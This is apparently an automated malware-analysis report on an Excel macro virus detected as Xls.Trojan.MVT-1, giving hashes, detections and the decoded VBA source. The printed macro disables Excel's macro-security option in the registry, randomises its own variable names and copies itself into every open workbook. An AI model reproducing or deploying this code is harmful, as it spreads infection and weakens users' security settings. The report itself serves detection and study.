Xls.Trojan.MVT-1 Office (OLE) malware analysis — malicious · 0c777875d33912d4

MALICIOUS

Office (OLE)

25.0 KB Created: 1999-08-28 15:09:24 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: 62feba7ad7eedd37618fa95fe66c9159 SHA-1: ed0273b12de662ba27a34ca941b086c06fb48029 SHA-256: 0c777875d33912d4c525c74c727a56d5c7fb2cf881d92783076ff14d8b126e97

180 Risk Score

Malware Insights

Xls.Trojan.MVT-1 · confidence 90%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as Xls.Trojan.MVT-1 by ClamAV, indicating malicious intent. The VBA macro code utilizes `CreateObject` to interact with Word and attempts to modify other workbooks by injecting its code, suggesting a propagation or downloader mechanism. The macro also contains obfuscated code and string manipulation, typical of malware attempting to evade detection.

Heuristics 3

ClamAV: Xls.Trojan.MVT-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.MVT-1
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7417 bytes
SHA-256: `0457a95a9d9453e2a0a4c7338eef0ad8b326b09365321b2cf100c899c8256289`
Detection ClamAV: Xls.Trojan.MVT-1 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DieseArbeitsmappe" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Deactivate() 'Fr33d0m Set OBJ = CreateObject("word.application"): OBJ.system.privateprofilestring("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: OBJ.Quit FULLCODE = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 15) Dim VARIABLE(1 To 8) VARIABLE(1) = "OBJ": VARIABLE(2) = "FULLCODE": VARIABLE(3) = "VARIABLE": VARIABLE(4) = "OUR_LOOP": VARIABLE(5) = "NEW_VAR": VARIABLE(6) = "VAR_POSITION": VARIABLE(7) = "NEXT_ONE": VARIABLE(8) = "TARGET" For OUR_LOOP = 1 To 8 NEW_VAR = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999) VAR_POSITION = 1 NEXT_ONE: VAR_POSITION = InStr(VAR_POSITION, FULLCODE, VARIABLE(OUR_LOOP)) If VAR_POSITION <> 0 Then FULLCODE = Mid(FULLCODE, 1, (VAR_POSITION - 1)) & NEW_VAR & Mid(FULLCODE, (VAR_POSITION + Len(VARIABLE(OUR_LOOP))), Len(FULLCODE)): GoTo NEXT_ONE Next For Each TARGET In Workbooks If TARGET.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 1) <> "Private Sub Workbook_Deactivate() 'Fr33d0m" Then TARGET.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.AddFromString FULLCODE: TARGET.SaveAs TARGET.FullName Next If Minute(Now()) = Second(Now()) Then MsgBox ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(17, 7), 0, "Class.Freed0m by jackie twoflower /Lz0NT /MVT /CC" End Sub ' Remorse in all forms will be removed from human thoughts ' and actions. Freedom will only be available through revolution ' or death. This system of a down is unavoidable as life on ' this planet becomes unneccessary. ' Open your eyes, open your mouths, close your hands and ' make a fist! Attribute VB_Name = "Tabelle1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Tabelle2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Tabelle3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True ' Processing file: /opt/analyzer/scan_staging/32c7b463a9104523b874d31bda5a0706.bin ' =============================================================================== ' Module streams: ' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 7328 bytes ' Line #0: ' FuncDefn (Private Sub Workbook_Deactivate()) ' QuoteRem 0x0022 0x0007 "Fr33d0m" ' Line #1: ' SetStmt ' LitStr 0x0010 "word.application" ' ArgsLd CreateObject 0x0001 ' Set OBJ ' BoS 0x0000 ' LitHI2 0x0000 ' LitStr 0x0000 "" ' LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel" ' LitStr 0x0008 "Options6" ' Ld OBJ ' MemLd system ' ArgsMemSt privateprofilestring 0x0003 ' BoS 0x0000 ' Ld OBJ ' ArgsMemCall Quit 0x0000 ' Line #2: ' LitDI2 0x0001 ' LitDI2 0x000F ' LitStr 0x0011 "DieseArbeitsmappe" ' Ld ThisWorkbook ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' ArgsMemLd Lines 0x0002 ' St FULLCODE ' Line #3: ' Dim ' LitDI2 0x0001 ' LitDI2 0x0008 ' VarDefn VARIABLE ' Line #4: ' LitStr 0x0003 "OBJ" ' LitDI2 0x0001 ' ArgsSt VARIABLE 0x0001 ' BoS 0x0000 ' LitStr 0x0008 "FULLCODE" ' LitDI2 0x0002 ' ArgsSt VARIABLE 0x0001 ' BoS 0x0000 ' LitStr 0x0008 "VARIABLE" ' LitDI2 0x0003 ' ArgsSt VARIABLE 0x0001 ' BoS 0x0000 ' LitStr 0x0008 "OUR_LOOP" ' LitDI2 0x0 ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.